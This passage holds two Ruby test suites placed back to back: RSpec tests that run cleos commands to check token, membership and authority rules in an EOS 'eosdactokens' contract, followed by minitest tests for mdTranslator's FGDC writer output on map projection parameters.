"issuer": "eosdactokens"
}
}
JSON
end
end
end
context "Issue new currency" do
it "without valid auth should fail" do
result = wrap_command %(cleos push action eosdactokens issue '{ "to": "eosdactokens", "quantity": "1000.0000 ABY", "memo": "Initial amount of tokens for you."}')
expect(result.stderr).to include('Transaction should have at least one required authority')
end
it "without owner auth should fail" do
result = wrap_command %(cleos push action eosdactokens issue '{ "to": "tester1", "quantity": "1000.0000 ABY", "memo": "Initial amount of tokens for you."} -p tester1')
expect(result.stderr).to include('Transaction should have at least one required authority')
end
it "with mismatching auth should fail" do
result = wrap_command %(cleos push action eosdactokens issue '{ "to": "eosdactokens", "quantity": "1000.0000 ABY", "memo": "Initial amount of tokens for you."}' -p eosio)
expect(result.stderr).to include('Error 3090004')
end
it "with valid auth should succeed" do
result = wrap_command %(cleos push action eosdactokens issue '{ "to": "eosdactokens", "quantity": "1000.0000 ABY", "memo": "Initial amount of tokens for you."}' -p eosdactokens)
expect(result.stdout).to include('eosdactokens::issue')
end
it "greater than max should fail" do
result = wrap_command %(cleos push action eosdactokens issue '{ "to": "eosdactokens", "quantity": "11000.0000 ABY", "memo": "Initial amount of tokens for you."}' -p eosdactokens)
expect(result.stderr).to include('Error 3050003')
end
it "for inflation with valid auth should succeed" do
result = wrap_command %(cleos push action eosdactokens issue '{ "to": "eosdactokens", "quantity": "2000.0000 ABY", "memo": "Initial amount of tokens for you."}' -p eosdactokens)
expect(result.stdout).to include('eosdactokens::issue')
end
end
context "Read back the stats after issuing currency should display max supply, supply and issuer" do
it do
result = wrap_command %(cleos get currency stats eosdactokens ABY)
expect(JSON.parse(result.stdout)).to eq JSON.parse <<~JSON
{
"ABY": {
"supply": "3000.0000 ABY",
"max_supply": "10000.0000 ABY",
"issuer": "eosdactokens"
}
}
JSON
end
end
context "Transfer some tokens" do
it "without auth should fail" do
result = wrap_command %(cleos push action eosdactokens transfer '{ "from": "eosdactokens", "to": "eosio", "quantity": "500.0000 ABY", "memo": "my first transfer"}')
expect(result.stderr).to include('Transaction should have at least one required authority')
end
it "with mismatching auth should fail" do
result = wrap_command %(cleos push action eosdactokens transfer '{ "from": "eosdactokens", "to": "eosio", "quantity": "500.0000 ABY", "memo": "my first transfer"}' -p eosio)
expect(result.stderr).to include('Error 3090004')
end
it "with valid auth should succeed" do
result = wrap_command %(cleos push action eosdactokens transfer '{ "from": "eosdactokens", "to": "eosio", "quantity": "500.0000 ABY", "memo": "my first transfer"}' --permission eosdactokens@active)
expect(result.stdout).to include('500.0000 ABY')
end
it "with amount greater than balance should fail" do
result = wrap_command %(cleos push action eosdactokens transfer '{ "from": "eosio", "to": "eosdactokens", "quantity": "50000.0000 ABY", "memo": "my first transfer"}' -p eosio)
expect(result.stderr).to include('Error 3050003')
end
it "Read back the result balance" do
result = wrap_command %(cleos get currency balance eosdactokens eosdactokens)
expect(result.stdout).to include('500.0000 ABY')
end
end
describe "Unlock tokens" do
it "without auth should fail" do
result = wrap_command %(cleos push action eosdactokens unlock '{"unlock": "9500.0000 ABP"}')
expect(result.stderr).to include('Error 3040003')
end
context "with auth should succeed" do
before do
run %(cleos push action eosdactokens create '{ "issuer": "eosdactokens", "maximum_supply": "10000.0000 ABX", "transfer_locked": true}' -p eosdactokens)
end
it do
result = wrap_command %(cleos push action eosdactokens unlock '{"unlock": "9500.0000 ABX"}' -p eosdactokens)
expect(result.stdout).to include('eosdactokens <= eosdactokens::unlock')
end
end
end
context "Burn tokens" do
before(:all) do
run %(cleos push action eosdactokens create '{ "issuer": "eosdactokens", "maximum_supply": "10000.0000 ABZ", "transfer_locked": true}' -p eosdactokens)
end
context "before unlocking token should fail" do
it do
result = wrap_command %(cleos push action eosdactokens burn '{"from": "eosdactokens", "quantity": "9500.0000 ABZ"}' -p eosdactokens)
expect(result.stderr).to include('Error 3050003')
end
end
context "After unlocking token" do
before(:all) do
run %(cleos push action eosdactokens unlock '{"unlock": "9500.0000 ABP"}' -p eosdactokens)
end
context "more than available supply should fail" do
before do
run %(cleos push action eosdactokens transfer '{"from": "eosdactokens", "to": "testuser1", "quantity": "900.0000 ABP", "memo": "anything"}' -p eosdactokens)
end
it do
result = wrap_command %(cleos push action eosdactokens burn '{"from": "testuser1", "quantity": "9600.0000 ABP"}' -p testuser1)
expect(result.stderr).to include('Error 3050003')
end
end
context "without auth should fail" do
it do
result = wrap_command %(cleos push action eosdactokens burn '{ "from": "eosdactokens","quantity": "500.0000 ABP"}')
expect(result.stderr).to include('Transaction should have at least one required authority')
end
end
context "with wrong auth should fail" do
it do
result = wrap_command %(cleos push action eosdactokens burn '{"from": "eosdactokens", "quantity": "500.0000 ABP"}' -p eosio)
expect(result.stderr).to include('Error 3090004')
end
end
context "with legal amount of tokens should succeed" do
it do
result = wrap_command %(cleos push action eosdactokens burn '{"from": "testuser1", "quantity": "90.0000 ABP"}' -p testuser1)
expect(result.stdout).to include('eosdactokens::burn')
end
end
end
end
context "Read back the stats after burning currency should display reduced supply, same max supply and issuer" do
it do
result = wrap_command %(cleos get currency stats eosdactokens ABP)
expect(JSON.parse(result.stdout)).to eq JSON.parse <<~JSON
{
"ABP": {
"supply": "910.0000 ABP",
"max_supply": "10000.0000 ABP",
"issuer": "eosdactokens"
}
}
JSON
end
end
context "newmemterms" do
it "without valid auth" do
result = wrap_command %(cleos push action eosdactokens newmemtermse '{ "terms": "New Latest terms", "hash": "termshashsdsdsd", "dac_id": "eosdac"}' -p tester1)
expect(result.stderr).to include('Ensure that you have the related private keys inside your wallet and your wallet is unlocked')
end
it "without empty terms" do
result = wrap_command %(cleos push action eosdactokens newmemtermse '{ "terms": "", "hash": "termshashsdsdsd", "dac_id": "eosdac"}' -p dacauthority)
expect(result.stderr).to include('Error 3050003')
end
it "with long terms" do
result = wrap_command %(cleos push action eosdactokens newmemtermse '{ "terms": "aasdfasdfasddasdfasdfasdfasddasdfasdfasdfasddasdfasdfasdfasddasdfasdfasdfasddasdfasdfasdfasddasdfasdfasdfasddasdfasdfasdfasddasdfasdfasdfasddasdfasdfasdfasddasdfasdfasdfasddasdfasdfasdfasddasdfasdfasdfasddasdfasdfasdfasddasdfasdfasdfasddasdfasdfasdfasddasdf", "hash": "termshashsdsdsd", "dac_id": "eosdac"}' -p dacauthority)
expect(result.stderr).to include('Error 3050003')
end
it "without empty hash" do
result = wrap_command %(cleos push action eosdactokens newmemtermse '{ "terms": "normallegalterms", "hash": "", "dac_id": "eosdac"}' -p dacauthority)
expect(result.stderr).to include('Error 3050003')
end
it "with long hash" do
result = wrap_command %(cleos push action eosdactokens newmemtermse '{ "terms": "normallegalterms", "hash": "asdfasdfasdfasdfasdfasdfasdfasdfl", "dac_id": "eosdac"}' -p dacauthority)
expect(result.stderr).to include('Error 3050003')
end
it "with valid terms and hash" do
result = wrap_command %(cleos push action eosdactokens newmemtermse '{ "terms": "normallegalterms", "hash": "asdfasdfasdfasdfasdfasd", "dac_id": "eosdac"}' -p dacauthority)
expect(result.stdout).to include('eosdactokens <= eosdactokens::newmemterms')
end
context "for other dac" do
it "with non matching auth" do
result = wrap_command %(cleos push action eosdactokens newmemtermse '{ "terms": "otherlegalterms", "hash": "asdfasdfasdfasdfffffasd", "dac_id": "otherdac"}' -p testuser1)
expect(result.stderr).to include('missing authority of otherdacacc')
end
it "with matching auth" do
result = wrap_command %(cleos push action eosdactokens newmemtermse '{ "terms": "otherlegalterms", "hash": "asdfasdfasdfasdfffffasd", "dac_id": "otherdac"}' -p otherdacacc)
expect(result.stdout).to include('eosdactokens <= eosdactokens::newmemtermse')
end
end
end
context "Read back the memberterms for eosdactokens", focus: true do
it do
result = wrap_command %(cleos get table eosdactokens eosdac memberterms)
expect(JSON.parse(result.stdout)).to eq JSON.parse <<~JSON
{
"rows": [{
"terms": "normallegalterms",
"hash": "asdfasdfasdfasdfasdfasd",
"version": 1
}
],
"more": false
}
JSON
end
end
context "Read back the memberterms for otherdac", focus: true do
it do
result = wrap_command %(cleos get table eosdactokens otherdac memberterms)
expect(JSON.parse(result.stdout)).to eq JSON.parse <<~JSON
{
"rows": [{
"terms": "otherlegalterms",
"hash": "asdfasdfasdfasdfffffasd",
"version": 1
}
],
"more": false
}
JSON
end
end
context "updatetermse" do
it "without valid auth" do
result = wrap_command %(cleos push action eosdactokens updatetermse '{ "termsid": 1, "terms": "termshashsdsdsd", "dac_id": "eosdac"}' -p tester1)
expect(result.stderr).to include('Ensure that you have the related private keys inside your wallet and your wallet is unlocked')
end
it "with long terms" do
result = wrap_command %(cleos push action eosdactokens updatetermse '{ "termsid": 1, "terms": "lkhasdfkjhasdkfjhaksdljfhlkajhdflkhadfkahsdfkjhasdkfjhaskdfjhaskdhfkasjdhfkhasdfkhasdfkjhasdkfjhklasdflkhasdfkjhasdkfjhaksdljfhlkajhdflkhadfkahsdfkjhasdkfjhaskdfjhaskdhfkasjdhfkhasdfkhasdfkjhasdfkjhasdkfjhaksdljfhlkajhdflkhadfkahsdfkjhasdkfjhaskdfjhaskdhfkasjdhfkhasdfkhasdfkjhasdkfjhklasdf", "dac_id": "eosdac"}' -p dacauthority)
expect(result.stderr).to include('Error 3050003')
end
it "with valid terms" do
result = wrap_command %(cleos push action eosdactokens updatetermse '{ "termsid": 1, "terms": "newtermslocation", "dac_id": "eosdac"}' -p dacauthority)
expect(result.stdout).to include('eosdactokens <= eosdactokens::updatetermse')
end
context "for other dac" do
it "with non matching auth" do
result = wrap_command %(cleos push action eosdactokens updatetermse '{ "termsid": 1, "terms": "asdfasdfasdfasdfffffasd", "dac_id": "otherdac"}' -p testuser1)
expect(result.stderr).to include('missing authority of otherdacacc')
end
it "with matching auth" do
result = wrap_command %(cleos push action eosdactokens updatetermse '{ "termsid": 1, "terms": "otherdacterms", "dac_id": "otherdac"}' -p otherdacacc)
expect(result.stdout).to include('eosdactokens <= eosdactokens::updatetermse')
end
end
end
context "Read back the memberterms for eosdactokens", focus: true do
it do
result = wrap_command %(cleos get table eosdactokens eosdac memberterms)
expect(JSON.parse(result.stdout)).to eq JSON.parse <<~JSON
{
"rows": [{
"terms": "newtermslocation",
"hash": "asdfasdfasdfasdfasdfasd",
"version": 1
}
],
"more": false
}
JSON
end
end
context "Read back the memberterms for otherdac", focus: true do
it do
result = wrap_command %(cleos get table eosdactokens otherdac memberterms)
expect(JSON.parse(result.stdout)).to eq JSON.parse <<~JSON
{
"rows": [{
"terms": "otherdacterms",
"hash": "asdfasdfasdfasdfffffasd",
"version": 1
}
],
"more": false
}
JSON
end
end
describe "Member reg" do
it "without auth should fail" do
result = wrap_command %(cleos push action eosdactokens memberrege '{ "sender": "eosio", "agreedterms": "New Latest terms", "dac_id": "eosdac"}')
expect(result.stderr).to include('Transaction should have at least one required authority')
end
it "with mismatching auth should fail" do
result = wrap_command %(cleos push action eosdactokens memberrege '{ "sender": "eosio", "agreedterms": "New Latest terms", "dac_id": "eosdac"}' -p testuser2)
expect(result.stderr).to include('Error 3090004')
end
it "with valid auth for second account should succeed" do
result = wrap_command %(cleos push action eosdactokens memberrege '{ "sender": "testuser2", "agreedterms": "asdfasdfasdfasdfasdfasd", "dac_id": "eosdac"}' -p testuser2)
expect(result.stdout).to include('eosdactokens::memberrege')
end
context "for other dac" do
it "with invalid managing_account should fail" do
result = wrap_command %(cleos push action eosdactokens memberrege '{ "sender": "eosio", "agreedterms": "New Latest terms", "dac_id": "eosdac"}' -p eosdactokens)
expect(result.stderr).to include('Error 3090004')
end
it "with valid managing account should succeed" do
result = wrap_command %(cleos push action eosdactokens memberrege '{ "sender": "testuser1", "agreedterms": "asdfasdfasdfasdfffffasd", "dac_id": "otherdac"}' -p testuser1)
expect(result.stdout).to include('eosdactokens::memberrege')
end
end
context "Read back the result for regmembers in eosdactokens hasagreed should have one account", focus: true do
it do
result = wrap_command %(cleos get table eosdactokens eosdac members)
expect(JSON.parse(result.stdout)).to eq JSON.parse <<~JSON
{
"rows": [
{"sender":"testuser2", "agreedtermsversion":1}
],
"more": false
}
JSON
end
end
context "Read back the result for regmembers in eosdactokens hasagreed should have one account", focus: true do
it do
result = wrap_command %(cleos get table eosdactokens otherdac members)
expect(JSON.parse(result.stdout)).to eq JSON.parse <<~JSON
{
"rows": [
{"sender":"testuser1", "agreedtermsversion":1}
],
"more": false
}
JSON
end
end
end
context "Update existing member reg" do
before(:all) do
run %(cleos push action eosdactokens newmemtermse '{ "terms": "normallegalterms2", "hash": "dfghdfghdfghdfghdfg", "dac_id": "otherdac"}' -p eosdactokens -p otherdacacc)
end
it "without auth should fail" do
result = wrap_command %(cleos push action eosdactokens memberrege '{ "sender": "tester3", "agreedterms": "subsequenttermsagreedbyuser", "dac_id": "eosdac"}')
expect(result.stderr).to include('Transaction should have at least one required authority')
end
it "with mismatching auth should fail" do
result = wrap_command %(cleos push action eosdactokens memberrege '{ "sender": "tester3", "agreedterms": "subsequenttermsagreedbyuser", "dac_id": "eosdac"}' -p eosdactokens)
expect(result.stderr).to include('Error 3090004')
end
it "with valid auth" do
result = wrap_command %(cleos push action eosdactokens memberrege '{ "sender": "testuser3", "agreedterms": "asdfasdfasdfasdfasdfasd", "dac_id": "eosdac"}' -p testuser3)
expect(result.stdout).to include('eosdactokens::memberrege')
end
context "for other dac" do
it "with invalid managing_account should fail" do
result = wrap_command %(cleos push action eosdactokens memberrege '{ "sender": "testuser3", "agreedterms": "dfghdfghdfghdfghdfg", "dac_id": "otherdac"}' -p dacauthority)
expect(result.stderr).to include('Error 3090004')
end
it "with valid managing account should succeed" do
result = wrap_command %(cleos push action eosdactokens memberrege '{ "sender": "testuser1", "agreedterms": "dfghdfghdfghdfghdfg", "dac_id": "otherdac"}' -p testuser1)
expect(result.stdout).to include('eosdactokens::memberrege')
end
end
end
context "Read back the result for regmembers on eosdactokens hasagreed should have entry" do
it do
result = wrap_command %(cleos get table eosdactokens eosdac members)
expect(JSON.parse(result.stdout)).to eq JSON.parse <<~JSON
{
"rows": [
{"sender":"testuser2", "agreedtermsversion":1},
{"sender":"testuser3", "agreedtermsversion":1}
],
"more": false
}
JSON
end
end
context "Read back the result for regmembers hasagreed should have entry" do
it do
result = wrap_command %(cleos get table eosdactokens otherdac members)
expect(JSON.parse(result.stdout)).to eq JSON.parse <<~JSON
{
"rows": [
{"sender":"testuser1", "agreedtermsversion":2}
],
"more": false
}
JSON
end
end
describe "Unregister existing member" do
it "without correct auth" do
result = wrap_command %(cleos push action eosdactokens memberunrege '{ "sender": "testuser3", "dac_id": "eosdac"}')
expect(result.stderr).to include('Transaction should have at least one required authority')
end
it "with mismatching auth" do
result = wrap_command %(cleos push action eosdactokens memberunrege '{ "sender": "testuser3", "dac_id": "eosdac"}' -p currency)
expect(result.stderr).to include('Error 3090003')
end
it "with correct auth" do
result = wrap_command %(cleos push action eosdactokens memberunrege '{ "sender": "testuser3", "dac_id": "eosdac"}' -p testuser3)
expect(result.stdout).to include('eosdactokens::memberunrege')
end
context "for other dac" do
it "with invalid managing account" do
result = wrap_command %(cleos push action eosdactokens memberunrege '{ "sender": "testuser1", "dac_id": "invaliddac"}' -p testuser1)
expect(result.stderr).to include('dac with dac_name not found')
end
it "with correct auth" do
result = wrap_command %(cleos push action eosdactokens memberunrege '{ "sender": "testuser1", "dac_id": "otherdac"}' -p testuser1)
expect(result.stdout).to include('eosdactokens::memberunrege')
end
end
end
context "Read back the result for regmembers has agreed should be 0" do
it do
result = wrap_command %(cleos get table eosdactokens eosdac members)
expect(JSON.parse(result.stdout)).to eq JSON.parse <<-JSON
{
"rows": [
{"sender":"testuser2", "agreedtermsversion":1}
],
"more": false
}
JSON
end
end
context "Read back the result for regmembers has agreed should be 0" do
it do
result = wrap_command %(cleos get table eosdactokens otherdac members)
expect(JSON.parse(result.stdout)).to eq JSON.parse <<-JSON
{
"rows": [],
"more": false
}
JSON
end
end
end

# MdTranslator - minitest of
# writers / fgdc / class_spatialReference
# History:
# Stan Smith 2018-01-03 original script
require_relative 'fgdc_test_parent'
require_relative '../../helpers/mdJson_hash_objects'
require_relative '../../helpers/mdJson_hash_functions'
class TestWriterFgdcMapProjection < TestWriterFGDCParent
# instance classes needed in script
TDClass = MdJsonHashWriter.new
# read the fgdc reference file
@@path = './metadata/spref/horizsys/planar/mapproj'
xFile = TestWriterFGDCParent.get_xml('mapProjection')
@@axExpect = xFile.xpath(@@path)
def get_response(hProjection)
mdHash = TDClass.base
hSpaceRef = TDClass.spatialReferenceSystem
hSpaceRef[:referenceSystemParameterSet][:projection] = hProjection
mdHash[:metadata][:resourceInfo][:spatialReferenceSystem] = []
mdHash[:metadata][:resourceInfo][:spatialReferenceSystem] << hSpaceRef
mdHash[:metadata][:resourceInfo][:spatialRepresentationType] = []
mdHash[:metadata][:resourceInfo][:spatialRepresentationType] << 'spatial representation type'
hResponseObj = ADIWG::Mdtranslator.translate(
file: mdHash.to_json, reader: 'mdJson', writer: 'fgdc', showAllTags: true, validate: 'none'
)
return hResponseObj
end
def test_mapProjection_alaska
expect = @@axExpect[0].to_s.squeeze(' ')
hProjection = TDClass.build_projection('alaska', 'Alaska Modified Stereographic')
TDClass.add_falseNE(hProjection)
hResponseObj = get_response(hProjection)
xMetadata = Nokogiri::XML(hResponseObj[:writerOutput])
xGot = xMetadata.xpath(@@path)
got = xGot.to_s.squeeze(' ')
assert_equal expect, got
assert hResponseObj[:writerPass]
assert_empty hResponseObj[:writerMessages]
# test empty elements
hProjection[:falseNorthing] = nil
hProjection[:falseEasting] = nil
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 2, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false easting is missing: CONTEXT is spatial reference horizontal planar map projection alaska'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false northing is missing: CONTEXT is spatial reference horizontal planar map projection alaska'
# test missing elements
hProjection.delete(:falseNorthing)
hProjection.delete(:falseEasting)
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 2, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false easting is missing: CONTEXT is spatial reference horizontal planar map projection alaska'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false northing is missing: CONTEXT is spatial reference horizontal planar map projection alaska'
end
# map projections - albers
def test_mapProjection_albers
expect = @@axExpect[1].to_s.squeeze(' ')
hProjection = TDClass.build_projection('albers', 'Albers Conical Equal Area')
TDClass.add_standardParallel(hProjection, 2)
TDClass.add_longCM(hProjection)
TDClass.add_latPO(hProjection)
TDClass.add_falseNE(hProjection)
hResponseObj = get_response(hProjection)
xMetadata = Nokogiri::XML(hResponseObj[:writerOutput])
xGot = xMetadata.xpath(@@path)
got = xGot.to_s.squeeze(' ')
assert_equal expect, got
assert hResponseObj[:writerPass]
assert_empty hResponseObj[:writerMessages]
# test empty elements
hProjection[:falseNorthing] = nil
hProjection[:falseEasting] = nil
hProjection[:standardParallel1] = nil
hProjection[:standardParallel2] = nil
hProjection[:longitudeOfCentralMeridian] = nil
hProjection[:latitudeOfProjectionOrigin] = nil
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 5, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection standard parallel is missing: CONTEXT is spatial reference horizontal planar map projection albers'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection longitude of central meridian is missing: CONTEXT is spatial reference horizontal planar map projection albers'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection latitude of projection origin is missing: CONTEXT is spatial reference horizontal planar map projection albers'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false easting is missing: CONTEXT is spatial reference horizontal planar map projection albers'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false northing is missing: CONTEXT is spatial reference horizontal planar map projection albers'
# test missing elements
hProjection.delete(:falseNorthing)
hProjection.delete(:falseEasting)
hProjection.delete(:standardParallel1)
hProjection.delete(:standardParallel2)
hProjection.delete(:longitudeOfCentralMeridian)
hProjection.delete(:latitudeOfProjectionOrigin)
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 5, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection standard parallel is missing: CONTEXT is spatial reference horizontal planar map projection albers'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection longitude of central meridian is missing: CONTEXT is spatial reference horizontal planar map projection albers'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection latitude of projection origin is missing: CONTEXT is spatial reference horizontal planar map projection albers'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false easting is missing: CONTEXT is spatial reference horizontal planar map projection albers'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false northing is missing: CONTEXT is spatial reference horizontal planar map projection albers'
end
# map projections - azimuthal equidistant
def test_mapProjection_azimuthalEquidistant
expect = @@axExpect[2].to_s.squeeze(' ')
hProjection = TDClass.build_projection('azimuthalEquidistant', 'Azimuthal Equidistant')
TDClass.add_longCM(hProjection)
TDClass.add_latPO(hProjection)
TDClass.add_falseNE(hProjection)
hResponseObj = get_response(hProjection)
xMetadata = Nokogiri::XML(hResponseObj[:writerOutput])
xGot = xMetadata.xpath(@@path)
got = xGot.to_s.squeeze(' ')
assert_equal expect, got
assert hResponseObj[:writerPass]
assert_empty hResponseObj[:writerMessages]
# test empty elements
hProjection[:falseNorthing] = nil
hProjection[:falseEasting] = nil
hProjection[:longitudeOfCentralMeridian] = nil
hProjection[:latitudeOfProjectionOrigin] = nil
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 4, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection longitude of central meridian is missing: CONTEXT is spatial reference horizontal planar map projection azimuthalEquidistant'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection latitude of projection origin is missing: CONTEXT is spatial reference horizontal planar map projection azimuthalEquidistant'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false easting is missing: CONTEXT is spatial reference horizontal planar map projection azimuthalEquidistant'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false northing is missing: CONTEXT is spatial reference horizontal planar map projection azimuthalEquidistant'
# test missing elements
hProjection.delete(:falseNorthing)
hProjection.delete(:falseEasting)
hProjection.delete(:longitudeOfCentralMeridian)
hProjection.delete(:latitudeOfProjectionOrigin)
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 4, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection longitude of central meridian is missing: CONTEXT is spatial reference horizontal planar map projection azimuthalEquidistant'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection latitude of projection origin is missing: CONTEXT is spatial reference horizontal planar map projection azimuthalEquidistant'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false easting is missing: CONTEXT is spatial reference horizontal planar map projection azimuthalEquidistant'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false northing is missing: CONTEXT is spatial reference horizontal planar map projection azimuthalEquidistant'
end
# map projections - equidistant conic
def test_mapProjection_equidistantConic
expect = @@axExpect[3].to_s.squeeze(' ')
hProjection = TDClass.build_projection('equidistantConic', 'Equidistant Conic')
TDClass.add_standardParallel(hProjection, 2)
TDClass.add_longCM(hProjection)
TDClass.add_latPO(hProjection)
TDClass.add_falseNE(hProjection)
hResponseObj = get_response(hProjection)
xMetadata = Nokogiri::XML(hResponseObj[:writerOutput])
xGot = xMetadata.xpath(@@path)
got = xGot.to_s.squeeze(' ')
assert_equal expect, got
assert hResponseObj[:writerPass]
assert_empty hResponseObj[:writerMessages]
# test empty elements
hProjection[:falseNorthing] = nil
hProjection[:falseEasting] = nil
hProjection[:standardParallel1] = nil
hProjection[:standardParallel2] = nil
hProjection[:longitudeOfCentralMeridian] = nil
hProjection[:latitudeOfProjectionOrigin] = nil
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 5, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection standard parallel is missing: CONTEXT is spatial reference horizontal planar map projection equidistantConic'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection longitude of central meridian is missing: CONTEXT is spatial reference horizontal planar map projection equidistantConic'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection latitude of projection origin is missing: CONTEXT is spatial reference horizontal planar map projection equidistantConic'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false easting is missing: CONTEXT is spatial reference horizontal planar map projection equidistantConic'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false northing is missing: CONTEXT is spatial reference horizontal planar map projection equidistantConic'
# test missing elements
hProjection.delete(:falseNorthing)
hProjection.delete(:falseEasting)
hProjection.delete(:standardParallel1)
hProjection.delete(:standardParallel2)
hProjection.delete(:longitudeOfCentralMeridian)
hProjection.delete(:latitudeOfProjectionOrigin)
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 5, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection standard parallel is missing: CONTEXT is spatial reference horizontal planar map projection equidistantConic'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection longitude of central meridian is missing: CONTEXT is spatial reference horizontal planar map projection equidistantConic'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection latitude of projection origin is missing: CONTEXT is spatial reference horizontal planar map projection equidistantConic'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false easting is missing: CONTEXT is spatial reference horizontal planar map projection equidistantConic'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false northing is missing: CONTEXT is spatial reference horizontal planar map projection equidistantConic'
end
# map projections - equirectangular
def test_mapProjection_equirectangular
expect = @@axExpect[4].to_s.squeeze(' ')
hProjection = TDClass.build_projection('equirectangular', 'Equirectangular')
TDClass.add_standardParallel(hProjection, 1)
TDClass.add_longCM(hProjection)
TDClass.add_falseNE(hProjection)
hResponseObj = get_response(hProjection)
xMetadata = Nokogiri::XML(hResponseObj[:writerOutput])
xGot = xMetadata.xpath(@@path)
got = xGot.to_s.squeeze(' ')
assert_equal expect, got
assert hResponseObj[:writerPass]
assert_empty hResponseObj[:writerMessages]
# test empty elements
hProjection[:falseNorthing] = nil
hProjection[:falseEasting] = nil
hProjection[:standardParallel1] = nil
hProjection[:longitudeOfCentralMeridian] = nil
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 4, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection standard parallel is missing: CONTEXT is spatial reference horizontal planar map projection equirectangular'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection longitude of central meridian is missing: CONTEXT is spatial reference horizontal planar map projection equirectangular'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false easting is missing: CONTEXT is spatial reference horizontal planar map projection equirectangular'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false northing is missing: CONTEXT is spatial reference horizontal planar map projection equirectangular'
# test missing elements
hProjection.delete(:falseNorthing)
hProjection.delete(:falseEasting)
hProjection.delete(:standardParallel1)
hProjection.delete(:longitudeOfCentralMeridian)
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 4, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection standard parallel is missing: CONTEXT is spatial reference horizontal planar map projection equirectangular'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection longitude of central meridian is missing: CONTEXT is spatial reference horizontal planar map projection equirectangular'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false easting is missing: CONTEXT is spatial reference horizontal planar map projection equirectangular'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false northing is missing: CONTEXT is spatial reference horizontal planar map projection equirectangular'
end
# map projections - general vertical near-side perspective
def test_mapProjection_generalVertical
expect = @@axExpect[5].to_s.squeeze(' ')
hProjection = TDClass.build_projection('generalVertical', 'General Vertical Near-sided Perspective')
TDClass.add_heightPP(hProjection)
TDClass.add_longPC(hProjection)
TDClass.add_latPC(hProjection)
TDClass.add_falseNE(hProjection)
hResponseObj = get_response(hProjection)
xMetadata = Nokogiri::XML(hResponseObj[:writerOutput])
xGot = xMetadata.xpath(@@path)
got = xGot.to_s.squeeze(' ')
assert_equal expect, got
assert hResponseObj[:writerPass]
assert_empty hResponseObj[:writerMessages]
# test empty elements
hProjection[:falseNorthing] = nil
hProjection[:falseEasting] = nil
hProjection[:heightOfProspectivePointAboveSurface] = nil
hProjection[:longitudeOfProjectionCenter] = nil
hProjection[:latitudeOfProjectionCenter] = nil
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 5, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection height of perspective point above surface is missing: CONTEXT is spatial reference horizontal planar map projection generalVertical'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection longitude of projection center is missing: CONTEXT is spatial reference horizontal planar map projection generalVertical'
